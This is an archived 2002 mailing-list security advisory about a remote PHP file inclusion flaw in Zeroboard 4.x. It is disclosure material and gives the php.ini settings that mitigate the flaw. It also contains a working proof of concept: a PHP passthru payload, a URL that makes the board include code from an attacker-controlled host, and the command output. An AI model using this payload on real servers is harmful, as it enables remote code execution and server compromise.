malicious PHP source injection

From: I'm I (onlookerat_private)
Date: Sat Jun 15 2002 - 09:15:15 PDT

  • Next message: Geoff Shively: "Re: Microsoft releases critical fix that breaks their own software!"

    JCC Security Advisory
    June 15, 2002
    malicious PHP source injection
    Zeroboard is one of popular PHP web boards in Korea.
    When allow_url_fopen = On and register_globals = On in php.ini, 
    Zeroboard has vulnerability because _head.php contains dangerous codes.
     So an attacker can include any files into server's PHP codes.
    All versions of Zeroboard 4.x.
    allow_url_fopen = off and register_globals = off. 
    Tested systems 
    Zeroboard 4.1pl2 Debian GNU/Linux SID(x86)
    We checked the vulnerability with "http://BOARD_URL/_head.php?_zb_path=WANTED_TO_INCLUDE" and
     made a sample code, alib.php,
    <? passthru("/bin/ls"); ?>
    and type the following URL to invoke this sample code.
    TEST URL : http://BOARD_URL/_head.php?_zb_path=http://MYBOX/a"
    -------out put----------------------------
    _foot.php _head.php admin admin.php admin_sendmail_ok.php admin_setup.php apply_vote.php check_user_id.php comment_ok.php config.php data del_comment.php del_comment_ok.php delete.php delete_ok.php download.php error.php icon image_box.php images include index.html install.php install1.php install2.php install2_ok.php install_ok.php latest_skin lib.php license.txt list_all.php login.php login_check.php logout.php lostid.php lostid_search.php member_join.php member_join_ok.php member_memo.php member_memo2.php member_memo3.php member_modify.php member_modify_ok.php member_out.php open_window.php outlogin.php outlogin_skin schema.sql script select_list_all.php send_message.php setup.php skin style.css view.php view_info.php view_info2.php view_preview.php vote.php write.php write_ok.php zboard.php zipcode 
    Fatal error: Call to undefined function: dbconn() in /home/morris/public_html/tmp/bbs/_head.php on line 41
    thx for BlackNight at r0ar
    --- morris Chang)
    e-mail : morrisat_private 

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